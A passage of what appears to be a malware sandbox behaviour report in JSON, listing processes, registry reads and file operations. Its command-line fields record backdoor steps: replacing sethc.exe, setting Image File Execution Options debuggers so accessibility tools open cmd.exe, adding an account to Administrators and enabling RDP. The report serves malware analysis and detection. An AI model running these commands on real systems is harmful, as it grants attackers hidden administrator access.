"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32",
"HKEY_CURRENT_USER\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM",
"HKEY_CLASSES_ROOT\\PROTOCOLS\\Name-Space Handler\\file\\",
"HKEY_CLASSES_ROOT\\PROTOCOLS\\Name-Space Handler\\",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_HANDLING",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\PROTOCOLS\\Filter\\text\/xml",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\WBEM\\CIMOM",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_HANDLING",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE"
],
"file_exists": [
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml"
],
"wmi_query": [
"SELECT Name FROM Win32_Group WHERE SID = 'S-1-5-32-555'"
],
"guid": [
"{2933bf95-7b36-11d2-b20e-00c04f983e60}",
"{78103fb7-aed7-4066-8bcd-30bb27b02331}",
"{2933bf93-7b36-11d2-b20e-00c04f983e60}",
"{4590f812-1d3a-11d0-891f-00aa004b2e24}",
"{00000003-0000-0000-c000-000000000046}",
"{855a71d0-e5cd-46de-9707-17f2bd1ed694}",
"{4590f811-1d3a-11d0-891f-00aa004b2e24}",
"{44aca674-e8fc-11d0-a07c-00c04fb68820}",
"{bfbf883a-cad7-11d3-a11b-00105a1f515a}",
"{8d1c559d-84f0-4bb3-a7d5-56a7435a9ba6}",
"{f6d90f12-9c73-11d3-b32e-00c04f990bb4}",
"{674b6698-ee92-11d0-ad71-00c04fd8fdff}",
"{8bc3f05e-d86b-11d0-a075-00c04fb68820}",
"{2933bf94-7b36-11d2-b20e-00c04f983e60}",
"{7c857801-7381-11cf-884d-00aa004b2e24}",
"{d5f569d0-593b-101a-b569-08002b2dbf7a}",
"{f309ad18-d86a-11d0-a075-00c04fb68820}",
"{dc12a687-737f-11cf-884d-00aa004b2e24}"
],
"file_read": [
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml",
"C:\\Windows\\System32\\wbem\\textvaluelist.xsl"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_MIME_HANDLING\\WMIC.exe",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\crypt32\\DebugHeapFlags",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\\*",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Tcpip\\Parameters\\Hostname",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\EnableObjectValidation",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\TextSource\\1\\TextSourceDll",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\Log File Max Size",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Tcpip\\Parameters\\Domain",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\DisableImprovedZoneCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\Logging Directory",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\Logging",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_MIME_HANDLING\\*",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\.xml\\Content Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\IsTextPlainHonored",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\\WMIC.exe",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Security_HKLM_only"
],
"directory_enumerated": [
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml"
]
},
"first_seen": 1574704388.015501,
"ppid": 2736
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3980,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections"
]
},
"first_seen": 1574704390.999876,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\cmd.exe",
"process_name": "cmd.exe",
"pid": 1432,
"summary": {
"dll_loaded": [
"ADVAPI32.dll",
"kernel32.dll"
],
"file_opened": [
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls",
"C:\\",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor"
],
"file_deleted": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat"
],
"file_exists": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\\n",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\\"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat\"",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp"
],
"file_failed": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat"
],
"command_line": [
"RDPWInst -w",
"timeout \/T 10 \/NOBREAK",
"RDPWInst -i -s"
],
"file_read": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\LogFileName",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\DefaultLevel",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\SaferFlags",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\PolicyScope",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Srp\\GP\\RuleCount",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\Levels",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\AutoRun"
],
"directory_enumerated": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\timeout.*",
"C:\\Python27\\Scripts\\timeout.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.COM",
"C:\\Python27\\timeout.*",
"C:\\Users\\cuck\\AppData",
"C:\\Windows\\System32\\timeout.*",
"C:\\Users",
"C:\\Python27\\timeout",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\timeout",
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Windows\\System32\\timeout.exe",
"C:\\Users\\cuck",
"C:\\Windows\\System32\\timeout.COM",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Python27\\Scripts\\timeout",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"C:\\Users\\cuck\\AppData\\Local"
]
},
"first_seen": 1574704388.281124,
"ppid": 2740
},
{
"process_path": "C:\\Windows\\SysWOW64\\net.exe",
"process_name": "net.exe",
"pid": 1948,
"summary": {
"command_line": [
"C:\\Windows\\system32\\net1 localgroup Administrators ontar \/add"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704387.374876,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\net1.exe",
"process_name": "net1.exe",
"pid": 2468,
"summary": {
"dll_loaded": [
"rpcrt4.dll",
"NETMSG",
"RPCRT4.dll"
],
"file_opened": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Rpc"
],
"file_written": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"file_read": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\MaxRpcSize",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\OOBEInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704387.640499,
"ppid": 1948
},
{
"process_path": "C:\\Windows\\SysWOW64\\sc.exe",
"process_name": "sc.exe",
"pid": 3996,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\sc.exe.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY"
]
},
"first_seen": 1574704400.781124,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\cmd.exe",
"process_name": "cmd.exe",
"pid": 2988,
"summary": {
"directory_created": [
"C:\\Windows\\System32\\dllcache"
],
"dll_loaded": [
"ADVAPI32.dll",
"kernel32.dll"
],
"file_opened": [
"",
"C:\\Windows\\System32\\dllcache\\sethc.exe",
"C:\\",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"\\Device\\NamedPipe\\",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui"
],
"file_copied": [
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\ServicePackFiles\\i386\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\SysWOW64\\dllcache\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\SysWOW64\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\System32\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\drmsvc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\System32\\dllcache\\wsethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\LastGood\\system32\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\System32\\dllcache\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\wpmsvc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\LastGood\\SysWOW64\\sethc.exe"
]
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor"
],
"file_moved": [
[
"C:\\Windows\\System32\\sethc.exe",
"C:\\Windows\\System32\\sethcr.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\System32\\sethc.exe"
]
],
"file_deleted": [
"C:\\Windows\\System32\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\SysWOW64\\sethc.exe"
],
"file_exists": [
"C:\\Windows\\System32\\sethc.exe",
"C:\\Windows\\ServicePackFiles\\i386\\sethc.exe",
"C:\\Windows\\System32\\sethcr.exe",
"C:\\Windows\\SysWOW64",
"C:\\Windows\\SysWOW64\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\subinacl.exe",
"C:\\Windows\\LastGood\\SysWOW64\\sethc.exe",
"C:\\Windows\\wpmsvc.exe",
"C:\\Windows\\drmsvc.exe",
"C:\\Windows\\System32\\dllcache\\wsethc.exe",
"C:\\Windows\\System32\\dllcache\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\LastGood\\system32\\sethc.exe",
"C:\\Windows\\SysWOW64\\dllcache\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\\"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat\"",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\\n",
"C:\\Windows\\System32"
],
"file_failed": [
"C:\\Windows\\System32\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\SysWOW64\\sethc.exe"
],
"command_line": [
"takeown \/F C:\\Windows\\SysWOW64\\sethc.exe",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Windows10Upgrade.exe\" \/v \"debugger\" \/t REG_SZ \/d \"fixmapi.exe\" \/f",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\" \/v \"debugger\" \/t REG_SZ \/d \"cmd.exe\" \/f",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EOSNotify.exe\" \/v \"debugger\" \/t REG_SZ \/d \"fixmapi.exe\" \/f",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" \/v \"debugger\" \/t REG_SZ \/d \"drmsvc.exe\" \/f",
"cacls C:\\Windows\\System32\\dllcache\\sethc.exe \/G :F SYSTEM:F",
"C:\\Windows\\system32\\cmd.exe \/S \/D \/c\" echo Y\"",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\uddisrw.exe\" \/v \"debugger\" \/t REG_SZ \/d \"wpmsvc.exe\" \/f",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ibhost.exe\" \/v \"debugger\" \/t REG_SZ \/d \"drmsvc.exe\" \/f",
"C:\\Windows\\system32\\cmd.exe \/S \/D \/c\" echo y\"",
"takeown \/F C:\\Windows\\System32\\sethc.exe",
"attrib -h -s -r C:\\Windows\\system32\\dllcache",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\" \/v \"debugger\" \/t REG_SZ \/d \"cmd.exe\" \/f",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" \/v \"debugger\" \/t REG_SZ \/d \"wpmsvc.exe\" \/f",
"cacls C:\\Windows\\SysWOW64\\dllcache\\sethc.exe \/G :F SYSTEM:F "
],
"file_read": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\LogFileName",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\DefaultLevel",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\SaferFlags",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\PolicyScope",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Srp\\GP\\RuleCount",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\Levels",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\AutoRun"
],
"directory_enumerated": [
"C:\\Python27\\attrib",
"C:\\Windows\\System32\\subinacl.exe.*",
"C:\\Python27\\cacls",
"C:\\Python27\\Scripts\\attrib",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Users\\cuck\\AppData",
"C:\\Windows\\subinacl.exe",
"C:\\Python27\\takeown",
"C:\\Windows\\y",
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\y",
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Windows\\System32\\attrib.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\cacls.*",
"C:\\Windows\\System32\\wbem\\subinacl.exe",
"C:\\Python27\\subinacl.exe.*",
"C:\\Windows\\System32\\y",
"C:\\Windows\\System32\\takeown.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg.*",
"C:\\Python27\\y.*",
"C:\\Windows\\System32\\cmd.exe",
"C:\\Python27\\Scripts\\cacls.*",
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\y.*",
"C:\\Windows\\SysWOW64\\sethc.exe",
"C:\\Python27\\cacls.*",
"C:\\Python27\\Scripts\\cacls",
"C:\\Windows\\y.*",
"C:\\Windows\\System32\\Reg.*",
"C:\\Windows\\System32\\subinacl.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\cacls",
"C:\\Python27\\Reg.*",
"C:\\Windows\\System32\\attrib.COM",
"C:\\Python27\\Scripts\\takeown.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\subinacl.exe.*",
"C:\\Users",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\attrib.*",
"C:\\Windows\\System32\\wbem\\y",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\takeown.*",
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\subinacl.exe.*",
"C:\\Windows\\System32\\y.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\y",
